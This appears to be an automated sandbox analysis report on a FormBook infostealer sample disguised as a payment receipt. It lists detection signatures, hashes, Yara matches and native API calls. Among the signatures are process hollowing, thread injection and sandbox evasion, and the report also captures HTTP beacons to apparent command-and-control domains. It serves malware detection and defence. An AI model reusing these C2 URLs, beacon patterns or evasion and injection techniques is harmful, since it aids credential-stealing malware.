Analysis Report Final-Payment-Receipt.exe

Overview

General Information

Sample Name:	Final-Payment-Receipt.exe
Analysis ID:	320833
MD5:	8f5d29001a9f5d4f62b47af6442be5ab
SHA1:	4838464ffe421aad7c9d73ba19420b7e9c2c427d
SHA256:	8e01fb320ffa60c0157bfc9aa8c6de43a7802d7f408de907a0d6338ce25c239c
Tags:	exe
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: Final-Payment-Receipt.exe

ReversingLabs: Detection: 34%

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Source: Final-Payment-Receipt.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe

Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h

0_2_055EBFA0

Networking:

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.wacrox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.trumpingitagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.themindofafunnygirl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
Source: Joe Sandbox View	ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: global traffic	HTTP traffic detected: GET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.wacrox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.trumpingitagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.themindofafunnygirl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: g.msn.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Nov 2020 21:20:27 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 31 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /71m/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Final-Payment-Receipt.exe, 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: wlanext.exe, 00000003.00000002.492344982.00000000041AF000.00000004.00000001.sdmp	String found in binary or memory: https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Final-Payment-Receipt.exe

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_00419D70 NtCreateFile,	1_2_00419D70
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_00419E20 NtReadFile,	1_2_00419E20
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_00419EA0 NtClose,	1_2_00419EA0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_00419F50 NtAllocateVirtualMemory,	1_2_00419F50
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_00419DC2 NtCreateFile,	1_2_00419DC2
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_00419E1F NtReadFile,	1_2_00419E1F
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_00419F4C NtAllocateVirtualMemory,	1_2_00419F4C
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_013F9910
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F99A0 NtCreateSection,LdrInitializeThunk,	1_2_013F99A0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_013F9860
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9840 NtDelayExecution,LdrInitializeThunk,	1_2_013F9840
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F98F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_013F98F0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9A20 NtResumeThread,LdrInitializeThunk,	1_2_013F9A20
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_013F9A00
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9A50 NtCreateFile,LdrInitializeThunk,	1_2_013F9A50
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9540 NtReadFile,LdrInitializeThunk,	1_2_013F9540
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F95D0 NtClose,LdrInitializeThunk,	1_2_013F95D0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9710 NtQueryInformationToken,LdrInitializeThunk,	1_2_013F9710
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F97A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_013F97A0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9780 NtMapViewOfSection,LdrInitializeThunk,	1_2_013F9780
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_013F9660
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F96E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_013F96E0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9950 NtQueueApcThread,	1_2_013F9950
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F99D0 NtCreateProcessEx,	1_2_013F99D0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9820 NtEnumerateKey,	1_2_013F9820
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013FB040 NtSuspendThread,	1_2_013FB040
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F98A0 NtWriteVirtualMemory,	1_2_013F98A0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9B00 NtSetValueKey,	1_2_013F9B00
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013FA3B0 NtGetContextThread,	1_2_013FA3B0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9A10 NtQuerySection,	1_2_013F9A10
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9A80 NtOpenDirectoryObject,	1_2_013F9A80
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013FAD30 NtSetContextThread,	1_2_013FAD30
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9520 NtWaitForSingleObject,	1_2_013F9520
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9560 NtWriteFile,	1_2_013F9560
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F95F0 NtQueryInformationFile,	1_2_013F95F0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9730 NtQueryVirtualMemory,	1_2_013F9730
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013FA710 NtOpenProcessToken,	1_2_013FA710
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013FA770 NtOpenThread,	1_2_013FA770
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9770 NtSetInformationFile,	1_2_013F9770
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9760 NtOpenProcess,	1_2_013F9760
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9FE0 NtCreateMutant,	1_2_013F9FE0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9610 NtEnumerateValueKey,	1_2_013F9610
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9670 NtQueryInformationProcess,	1_2_013F9670
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F9650 NtQueryValueKey,	1_2_013F9650
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013F96D0 NtCreateKey,	1_2_013F96D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759A50 NtCreateFile,LdrInitializeThunk,	3_2_03759A50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_03759910
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037599A0 NtCreateSection,LdrInitializeThunk,	3_2_037599A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_03759860
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759840 NtDelayExecution,LdrInitializeThunk,	3_2_03759840
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759710 NtQueryInformationToken,LdrInitializeThunk,	3_2_03759710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759FE0 NtCreateMutant,LdrInitializeThunk,	3_2_03759FE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759780 NtMapViewOfSection,LdrInitializeThunk,	3_2_03759780
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_03759660
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759650 NtQueryValueKey,LdrInitializeThunk,	3_2_03759650
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037596E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_037596E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037596D0 NtCreateKey,LdrInitializeThunk,	3_2_037596D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759540 NtReadFile,LdrInitializeThunk,	3_2_03759540
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037595D0 NtClose,LdrInitializeThunk,	3_2_037595D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759B00 NtSetValueKey,	3_2_03759B00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0375A3B0 NtGetContextThread,	3_2_0375A3B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759A20 NtResumeThread,	3_2_03759A20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759A10 NtQuerySection,	3_2_03759A10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759A00 NtProtectVirtualMemory,	3_2_03759A00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759A80 NtOpenDirectoryObject,	3_2_03759A80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759950 NtQueueApcThread,	3_2_03759950
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037599D0 NtCreateProcessEx,	3_2_037599D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0375B040 NtSuspendThread,	3_2_0375B040
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759820 NtEnumerateKey,	3_2_03759820
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037598F0 NtReadVirtualMemory,	3_2_037598F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037598A0 NtWriteVirtualMemory,	3_2_037598A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0375A770 NtOpenThread,	3_2_0375A770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759770 NtSetInformationFile,	3_2_03759770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759760 NtOpenProcess,	3_2_03759760
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759730 NtQueryVirtualMemory,	3_2_03759730
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0375A710 NtOpenProcessToken,	3_2_0375A710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037597A0 NtUnmapViewOfSection,	3_2_037597A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759670 NtQueryInformationProcess,	3_2_03759670
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759610 NtEnumerateValueKey,	3_2_03759610
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759560 NtWriteFile,	3_2_03759560
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0375AD30 NtSetContextThread,	3_2_0375AD30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03759520 NtWaitForSingleObject,	3_2_03759520
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037595F0 NtQueryInformationFile,	3_2_037595F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EC9EA0 NtClose,	3_2_02EC9EA0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EC9E20 NtReadFile,	3_2_02EC9E20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EC9F50 NtAllocateVirtualMemory,	3_2_02EC9F50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EC9D70 NtCreateFile,	3_2_02EC9D70
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EC9E1F NtReadFile,	3_2_02EC9E1F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EC9F4C NtAllocateVirtualMemory,	3_2_02EC9F4C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EC9DC2 NtCreateFile,	3_2_02EC9DC2

Detected potential crypto function

Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_008BC2B0	0_2_008BC2B0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_008B9970	0_2_008B9970
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_0492CBE8	0_2_0492CBE8
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_049280A0	0_2_049280A0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_04926E98	0_2_04926E98
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_04926EA8	0_2_04926EA8
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_0492CBDA	0_2_0492CBDA
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_055E74F0	0_2_055E74F0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_055E01D0	0_2_055E01D0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_055E01E0	0_2_055E01E0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_055E74E0	0_2_055E74E0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_055E6A50	0_2_055E6A50
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_055E6A41	0_2_055E6A41
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0041D3C1	1_2_0041D3C1
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0041E5DA	1_2_0041E5DA
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_00402D90	1_2_00402D90
